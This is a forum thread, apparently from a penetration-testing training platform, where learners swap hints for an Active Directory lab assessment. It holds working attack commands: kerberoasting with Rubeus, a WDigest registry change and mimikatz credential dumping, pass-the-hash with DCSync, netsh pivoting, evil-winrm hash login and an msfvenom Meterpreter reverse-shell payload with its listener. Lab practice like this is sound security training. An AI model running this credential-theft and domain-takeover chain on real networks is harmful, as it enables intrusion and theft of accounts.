Active Directory - Skills Assessment I

Sorry about the stupid question but: I can’t get a better shell. All my tryes give me shells that doesn’t allow me to run mimikatz or Enter-PSSession. wich one did you use?

1 Like

Hi, I am stuck on Skills Assessment Part I to find tpetty password. The question is: Submit this user’s cleartext password.
I have tried mimikatz, crackmapexec, rubeus, dumping lsa, connecting with smb but nothing works. I tried from Kali and Windows. I have uploaded tools on Windows to try from there. With this command C:\Rubeus.exe kerberoast /outfiles:hashes.txt [/user:tpetty] [/domain:INLANEFREIGHT.LOCAL] [/dc:DC01.INLANEFREIGHT.LOCAL] I saw 7 hashes but there isnt tpetty name. Mimikatz found only admin account. Can someone write steps to find cleartext password?

Edit: I have found NTLM hash of tpetty but hashcat was unable to crack it. Anyone knows how to crack it?

1 Like

I know researching is the best practise to be a good hacker, but here is my grain of sand.
For those who are stucked in the cleartext password and you are not able to dump lsass with mimikatz:
From new(relatively) versions, microsoft add a secure conf to the wdigest reg to prevent its dump using mimikatz.
Just go to cmd and change the value of REG_DWORD to 1:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
and after that, force the update:
gpupdate /force

Now dump it again and there it is…

This doesn’t show clear-text password for me, after changing the registry and dumping with mimikatz it shows (null) under wdigest

Dump de lsass with mimi

Could’t succeed with your suggestion, it doesn’t work with Mimikatz, but I succeeded with dumping SAM files, with secretsdump I found cleartext password…

I did it that way

To anyone having issues with pivoting to DC. You would get a hint from the Bloodhound to escalate the privs from t*****. Do the Attack mentioned in Bloodhound correctly with impersonation. Read the Mimikatz docs in detail.

This one was difficult due to some items not really covered in the modules.

If you’re stuck on the DCSync follow this link and review the part that goes over a registry change. You’ll have to reboot the MS01 server for that change to apply. You should then be able to perform the DCSync attack.

For the final challenge (Domain Takeover) I suggest Googling PTH.

Hello guys!! I am really stuck with an error when I tried to use xfreerdp with proxychains. I used meterpreter tunnelling and pivoted the WEB01 machine to make xfreerdp to MS01. Although proxychains nmap command works, xfreedrp gives an error. It says “Please check that the $DISPLAY environment variable is properly set”. Actually it was working before, but I gave a break for a few weeks. And now I can’t make it work. You guys have any idea on what I am missing? Thanks.

Does anyone else having problems with the webshell? I can log into it just fine but cannot execute any commands nor upload anything. It’s just loading and after some time the connection is reset. Am I missing something here?

try doing /timeout:<time in ms> for xfreerdp and setting resolutoin /size:

To ellerion, i created a metasploit reverse shell to the jumphost, then set up proxychains so you can nmap scan it. You can scan port 3389 specifically.

This box is so cooked.

First try I did, on my web shell no matter what I did with nc.exe it would crash the whole thing and i wouldn’t get a stable shell. Use meterpreter instead and chisel which worked. However i couldn’t RDP into ms01 no matter how hard i tried.

Second try, I used the same chisel.exe and transferred it, with the same commands it didn’t work. It says “Class not registered” or something. Ended up using local port fwd on meterpreter, and tried proxychains with autoroute, both didnt work.

Third try, same chisel didn’t work, even after i downloaded a new one. Local port fwd with the same commands finally worked. I RDP-ed successfully, but no matter what the wdigest couldn’t work, even with the suggestions here. Secretsdump.py wouldn’t work as well.

Fourth try, I tried to get a shell with meterpreter instead. Set up reverse port forwarding so that remote host could download from my attack host through the jumphost. The InvokeWebRequest to get revshell actually worked, but only once. Afterwards i tried downloading other files over, or the same file again, and it couldn’t make a connection to my attacker http.server. Revshell couldn’t make a connection as well.

These boxes are literally so buggy i don’t even know how you guys are doing this.

1 Like

For those still struggling with tpetty clear password. * 10.129.230.129 is the box address generated from section, port 1515 is just number that does not get blocked, lu**** is the svc_sql clear text password

  1. netsh interface portproxy add v4tov4 listenport=1515 listenaddress= connectport=3389 connectaddress=172.16.6.50
  2. xfreerdp /v:10.129.230.129:1515 /u:svc_sql /p:lu**** +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
  3. Copy mimikatz to locasystem from shared location folder
  4. run powershell with admin right
  5. reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
  6. gpupdate /force
  7. REBOOT the windows machine, YES I mean it, click the reboot button of the machine you just rdp in through netsh
  8. mimkatz
  9. privilege::debug
  10. sekurlsa::logonPasswords

For the last question,

  • Use mimikatz to DC-Sync
  • sekurlsa::pth /user:tpetty /ntlm: /domain:dc01.inlanefreight.local /impersonate
  • lsadump::dcsync /domain:INLANEFREIGHT.LOCAL
  • Got the Administrator Hash
  • create port forwrding (mine use netsh.exe with port 5985 for evil-winrm)
  • netsh.exe interface portproxy add v4tov4 listenport=2515 listenaddress=10.129.94.122 connectport=5985 connectaddress=172.16.6.3
  • evil-winrm -i 10.129.94.122 -u “Administrator” -H
  • Go get the flag

Finally finish the first part , moving to the second part

Hey, were you able to move forward? I’m struggling to proxy my tools through the web server (the machine hosting the webshell). I tried Chisel, it connected, but I could not interact with the internal network. I also tried to get a reverse shell with both Meterpreter and ConPty shell, but no luck, lol. I’m so frustrated; I don’t even know what to do now. Could you at least help me get a shell on the web server, if possible? Thanks in advance! :pensive: :angry:

Also here is my discord, i will notice it quicker if u contact me on discord
magdy3660

mag0x00

I definitely used meterpreter.
msfvenom -p windows/x64/meterpreter/reverse_https lhost= -f exe -o backupscript.exe LPORT=8080

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 8000
run

If you can’t get a reverse shell on the web server then im not sure either sorry :frowning:
If metasploit works just set up autoroute and port forwarding, and add the correct subnet. From there i pretty much just use proxychains.